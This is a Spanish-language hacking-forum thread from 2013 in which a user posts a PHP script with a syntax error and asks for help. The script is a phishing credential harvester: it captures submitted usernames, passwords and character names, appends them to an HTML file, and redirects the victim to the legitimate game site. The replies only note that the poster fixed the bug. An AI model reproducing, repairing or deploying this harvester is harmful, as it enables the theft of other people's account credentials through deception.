elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web
| | |-+  PHP (Moderador: #!drvy)
| | | |-+  php post
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: php post  (Leído 2,428 veces)
asdexiva

Desconectado Desconectado

Mensajes: 217



Ver Perfil
php post
« en: 19 Enero 2013, 23:09 pm »

Código:
<?
#xd.php
// Asigna el valor a las variables del usuario y contraseña
$usuario = $_POST['Usuario'];
$contraseña = $_POST['Contrasena'];
$character = $_POST['Character'];
//Asigna el valor a la variable donde se guarda el usuario contraseña y character
$guardame = fopen('leeme.html','a+');
fwrite($guardame,
"<br/><b>Usuario:</b>".$usuario.
"<br/><b>Contrasena:</b>".$contraseña." ");
"<br/><b>Character:</b>".$character." ");

fclose($guardame);
//Redirecciona a la web original (pazzur)
echo "<meta http-equiv='refresh' content='1;url=http://8c5d92d5.any.gs'>"
?>

dice que tengo un error en esta linea :S no entiendo xd
Código:
"<br/><b>Character:</b>".$character." ");


En línea

asdexiva

Desconectado Desconectado

Mensajes: 217



Ver Perfil
Re: php post
« Respuesta #1 en: 19 Enero 2013, 23:11 pm »

e solucionado el problema :S haha
no contesten sorry


En línea

#!drvy
Moderador
***
Desconectado Desconectado

Mensajes: 5.850



Ver Perfil WWW
Re: php post
« Respuesta #2 en: 19 Enero 2013, 23:12 pm »

Hay un subforo especifico para PHP.

PD: Te iba a responder pero ya veo que lo solucionaste xD

Saludos
En línea

moskita789

Desconectado Desconectado

Mensajes: 57


Ver Perfil
Re: php post
« Respuesta #3 en: 22 Enero 2013, 17:05 pm »

cuando se solucionan es bueno que por error pavo o lo que fuese.. dejen la solucion.. creo que el error esta en que cierras la funciona antes ).
igualmente vale que la aclares. gracias
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Los Post
Sugerencias y dudas sobre el Foro
magnox 1 1,933 Último mensaje 22 Septiembre 2004, 04:37 am
por el-brujo
GET y POST a la vez
PHP
dimitrix 4 5,138 Último mensaje 23 Febrero 2008, 22:49 pm
por dimitrix
Por que cierran un post cuando se abre un post para reclamar porque cerraron...
Sugerencias y dudas sobre el Foro
jdc 2 3,082 Último mensaje 25 Septiembre 2012, 21:50 pm
por WHK
Mi post :(
Sugerencias y dudas sobre el Foro
Anonymous V de Vendetta 3 2,743 Último mensaje 9 Marzo 2013, 23:44 pm
por simorg
get o post con BACTH
Scripting
John1Connor 0 1,633 Último mensaje 21 Julio 2015, 10:09 am
por John1Connor
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines